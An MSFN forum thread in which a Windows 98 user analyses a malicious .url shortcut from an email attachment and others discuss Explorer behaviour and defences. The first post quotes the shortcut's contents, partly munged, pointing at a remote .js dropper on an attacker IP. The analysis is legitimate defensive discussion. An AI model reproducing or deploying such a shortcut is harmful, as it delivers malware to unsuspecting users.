Jump to content
Strawberry Orange Banana Lime Leaf Slate Sky Blueberry Grape Watermelon Chocolate Marble
Strawberry Orange Banana Lime Leaf Slate Sky Blueberry Grape Watermelon Chocolate Marble

MSFN is made available via donations, subscriptions and advertising revenue. The use of ad-blocking software hurts the site. Please disable ad-blocking software or set an exception for MSFN. Alternatively, register and become a site sponsor/subscriber and ads will be disabled automatically. 


Nomen

Interesting malware received via email

Recommended Posts

Got an email recently from an IP-range (191.37.0.0/16) that my server was blocking until recently when I opened the range for some reason (needless to say I will be blocking it again). The email came with an attachment named IMG_20180402_(9-digit-number).zip

When unzipped, it gives this file- 4403BLGL_Q A file with no extension. At least I don't see one when viewing the folder in win-98. But get this - it does have an extension. In DOS, the file name is 4403BLGL_Q.url

So my first question is, does explorer have special handling for .url files? Something that sort-of bugged me is the immediately after unzipping to it's own folder, and then opening that folder, I could see that file, but the folder seemed to be frozen for 10, 20 seconds. Wasn't responding to mouse clicks. The icon associated with the file was sort-of strange.

I think it hangs because the file-properties says it's an internet shortcut, and these files have a Web Document file property URL and this file's URL was "file // 169.239.128.129 /upload/4403BLGL_Q.js" In other words, I believe that .js file was trying to be downloaded and executed just by viewing the folder where what file resides. That site wasn't giving me that .js file. I believe it was trying to render the icon for the file from that .js file which it was trying to remotely access. The file itself contains the following (and even though I've munged part of the following, it still might trigger an A/V response either by the msfn server or your browser):

[{000214A0-0000-0000-C000-000000000046}]

Prop3=19,9 [InternetShortcut]

URL=file //blabla 169.239.128.129/upload/4403BLGL_Q.js

IconFile=C:\Windows\system32\shell32.dll

IconIndex=46 IDList= HotKey=0

Anyways, only 7 out of 60 AV programs identifies this file as a threat. It's mostly called Jesdow.B. The machine hosting the .js file was not serving it to me as of the time I was looking into this, so I don't know if it was taken down or it didn't like my user-agent. My basic question here is, is this a new threat vector mechanism? Is there a way to deactivate explorer's handling of .URL files or any file with this property? Would win-98 have actually processed the .js file correctly anyways?

Share this post


Link to post
Share on other sites

Isn't there an option for explorer to show file extensions even for known types? That should make it appear. That IP is reported as a spam address for email/phishing/sms, and the server is still running even though it does show 404 for the full address in your link. It is possible that it was "Caught" but since I see a report for 9 hours ago, it is also possible it only temporarily hosts the malware files on it.

Share this post


Link to post
Share on other sites

I was looking into this .js file last night (about 14 hours ago) and even then that IP wasn't giving me the .js file.  Yes, I have explorer set to show file extensions, but I think there are still exceptions that require registry modifications to show (like shell scrap objects).  Maybe this .url is another such file type?

Share this post


Link to post
Share on other sites

I always UnZip Files from a DOS Box. All extensions are visible and nothing can be executed.

Share this post


Link to post
Share on other sites
4 hours ago, Nomen said:

URL=file //blabla 169.239.128.129/upload/4403BLGL_Q.js

usual js downloader/dropper/injector. nothing abnormal.

u or ur email program open it url file (its shortcut), shell is go to link, download js file, exec it, ur ie core will attacked by this or any secondary loaded script...

Share this post


Link to post
Share on other sites
Posted (edited)

Although the mentioned adress sounded for me like a normal IP for the private network (according to Wikipedia however I am wrong) the Anti-Virus software detects the IP to be malware on my (non Windows 98SE) system. Access is blocked for me therefore.

I do assume that the .url file extension gets hidden similiar to .lnk or .exe if Windows 98 is configured to do so.

 

Edited by winxpi

Share this post


Link to post
Share on other sites
49 minutes ago, winxpi said:

I do assume that the .url file extension gets hidden similiar to .lnk or .exe if Windows 98 is configured to do so.

Yes, similar to .lnk and .pif.
 

Share this post


Link to post
Share on other sites

The fact the the extension is not shown by explorer is not the primary item I thought would be discussed here.  It was the fact that simply viewing the folder containing the file in question triggered the attempted downloading of the .js file, and because the IP address was no longer hosting the .js file, the explorer folder window was frozen for a time while the attempted download timed out.  I was wondering how common it is to have this file-type trigger this behavior on the part of explorer.  Is this a known exploit method?   Does win-98 know what to do with a .js file in this context?  Is there a registry entry that can disable this behavior?

 

Share this post


Link to post
Share on other sites

I believe this behaviour is tied to "Preview Mode" which also can show thumbnails for image files, or .htm for example. When I look at this, it seems to relate to this CLSID: BB2E617C-0920-11d1-9A0B-00C04FC2D6C1 where most people have the opposite problem... their preview in Explorer does not work and they want to restore it. And then they need to create this key because it is missing.

Ref: http://www.oocities.org/~budallen/98reghak.html#Restore Preview Mode (Thumbnail) to Windows

But even that site says that is for everything... so if you are fine with that, you can backup that key and then delete it, reboot (or kill and restart explorer.exe) and see if it solves the issue. Before that, it does talk about using regsvr to handle just JPG files, perhaps there is another way to just handle .url files. ALSO, it may be worthwhile to use a software firewall and blacklist explorer.exe from accessing the internet, or just port 80... presuming that doesn't cause an issue with any other programs... You'd have to test it of course.

Share this post


Link to post
Share on other sites
On 4.4.2018 at 2:40 PM, Nomen said:

The fact the the extension is not shown by explorer is not the primary item I thought would be discussed here.  It was the fact that simply viewing the folder containing the file in question triggered the attempted downloading of the .js file, and because the IP address was no longer hosting the .js file, the explorer folder window was frozen for a time while the attempted download timed out.  I was wondering how common it is to have this file-type trigger this behavior on the part of explorer.  Is this a known exploit method?   Does win-98 know what to do with a .js file in this context?  Is there a registry entry that can disable this behavior?

 

Your questions are good. I dont know the answer if its an exploit. But its sounds like one.

The freezing: Could be some issue related to Windows Explorer or the browser that attemped the download. Not sure.

Windows 98 has the Active Desktop. I really dont know how it works to be honest. I just remember that it had the ability to make folders open like links (one-click instead of double clicks) and I think it was not so uncommon to sometimes have desktop backgrounds of pics that were actually on a webpage (not sure if they were actually embedded on the browser or downloaded to a temporary folder to do that). But the Active Desktop might have to do while win98 "did something" regarding the .js file.

You might try do disable Active Desktop, but I dont know if this behaviour from the .js files can be disabled by a registry change(maybe for IE but probably not for all browsers), it really depends what was going on there and I cannot rule-out that an exploit was used.

My first guess would be that the folder might have some thing like preview mode, I mean this feature that allows you to see a preview of a photo or video. Might be that this triggers a .js file. Not sure however.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Recently Browsing   0 members

    No registered users viewing this page.

×